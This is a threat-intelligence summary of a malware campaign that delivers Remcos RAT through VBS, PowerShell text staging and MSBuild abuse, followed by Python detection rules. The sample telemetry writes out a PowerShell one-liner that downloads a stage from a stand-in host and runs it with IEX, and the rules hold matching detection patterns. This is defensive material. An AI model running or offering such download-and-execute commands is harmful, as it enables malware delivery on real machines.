SHADOW#REACTOR – Text-Only Staging, .NET Reactor, and In-Memory Remcos RAT Deployments
Essential information
- Published
- 13/01/2026 16:17
- Modified
- 13/01/2026 16:31
- Tags
- .net reactor, 2026-01-13, in-memory execution, living-off-the-land binaries, msbuild abuse, obfuscation, powershell, reflective loading, remcos rat, text-only staging, vbs
- Related entities
- 12 observables, 8 techniques (mitre), 1 malware
Description
This analysis examines a multi-stage Windows malware campaign called SHADOW#REACTOR. The infection chain uses obfuscated VBS, PowerShell downloaders, and text-based payloads to deliver a Remcos RAT backdoor. Key features include fragmented text staging, .NET Reactor protection, reflective loading, and MSBuild abuse as a living-off-the-land binary. The campaign leverages complex obfuscation and in-memory execution to evade detection while establishing persistent remote access. Defensive recommendations focus on script execution monitoring, LOLBin abuse detection, and enhanced PowerShell logging to counter the sophisticated evasion techniques employed.
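The defensive recommendations above (script execution monitoring, LOLBin abuse detection, PowerShell logging) can be turned into concrete process-creation rules. The following is an added example written for this summary, not code from the SHADOW#REACTOR report: it evaluates constructed process-creation records (field names `image`, `parent_image`, `command_line` are assumed, modelled loosely on Sysmon Event ID 1 / Windows 4688) for the three behaviours the chain relies on: a script host (VBS) launching PowerShell, a PowerShell command line that downloads content and then executes or reflectively loads it, and MSBuild.exe started by a script host or pointed at a project file in a user-writable path. All sample events and URLs are constructed for illustration.

```python
"""Process-creation detections for the SHADOW#REACTOR-style tradecraft:
script host -> PowerShell, download-and-load one-liners, MSBuild as a LOLBin.
All events below are constructed samples; field names are assumptions."""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
MSBUILD = "msbuild.exe"

# Paths a normal build would not use as a project-file location.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\appdata|programdata|temp|windows\\temp)\\", re.I)
# Indicators of the text-only staging step (fetch a payload as text)...
DOWNLOAD = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I)
# ...and of executing / reflectively loading what was fetched.
REFLECTIVE = re.compile(
    r"\[(system\.)?reflection\.assembly\]::load|\.invoke\(|invoke-expression|\biex\b", re.I)
ENCODED = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str
    reason: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the list of Findings raised by a single process-creation event."""
    findings = []
    img = basename(event["image"])
    parent = basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "")

    # Rule 1: VBS/JS/HTA host spawning PowerShell (the first hop of the chain).
    if img in POWERSHELL and parent in SCRIPT_HOSTS:
        findings.append(Finding("script_host_to_powershell", img, f"parent {parent}"))

    # Rule 2: PowerShell that both fetches remote content and executes/loads it.
    if img in POWERSHELL:
        hits = [name for name, rx in (("download", DOWNLOAD),
                                      ("reflective_load", REFLECTIVE),
                                      ("encoded", ENCODED)) if rx.search(cmd)]
        if "download" in hits and ("reflective_load" in hits or "encoded" in hits):
            findings.append(Finding("powershell_download_and_load", img, "+".join(hits)))

    # Rule 3: MSBuild.exe used as a LOLBin rather than by a build tool/IDE.
    if img == MSBUILD:
        if parent in SCRIPT_HOSTS | POWERSHELL:
            findings.append(Finding("msbuild_from_script_host", img, f"parent {parent}"))
        if USER_WRITABLE.search(cmd):
            findings.append(Finding("msbuild_project_in_user_writable_path", img,
                                    "project file in user-writable location"))
    return findings


def run_detections(events: list) -> list:
    """Evaluate every event and flatten the findings."""
    return [f for ev in events for f in evaluate(ev)]


# Constructed sample telemetry (not from the report). Two malicious hops, two benign.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'''powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1.txt')"'''},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" C:\Users\victim\AppData\Local\Temp\build.proj'},
    {"image": r"C:\Program Files\Microsoft Visual Studio\2022\MSBuild\Current\Bin\MSBuild.exe",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\2022\Common7\IDE\devenv.exe",
     "command_line": r'"C:\Program Files\Microsoft Visual Studio\2022\MSBuild\Current\Bin\MSBuild.exe" C:\src\app\app.csproj'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS):
        print(f"{f.rule:40} {f.image:16} {f.reason}")
```

Running the block prints four findings for the two malicious events and none for the IDE-driven MSBuild run or the scheduled inventory script. Rule 2 deliberately requires both a download indicator and an execute/load indicator, which keeps ordinary `Invoke-WebRequest` administration out of the alert stream; in a real deployment the same logic would be fed from PowerShell script block logging (Event ID 4104) as well as process creation, since the obfuscated one-liner is often only visible after decoding.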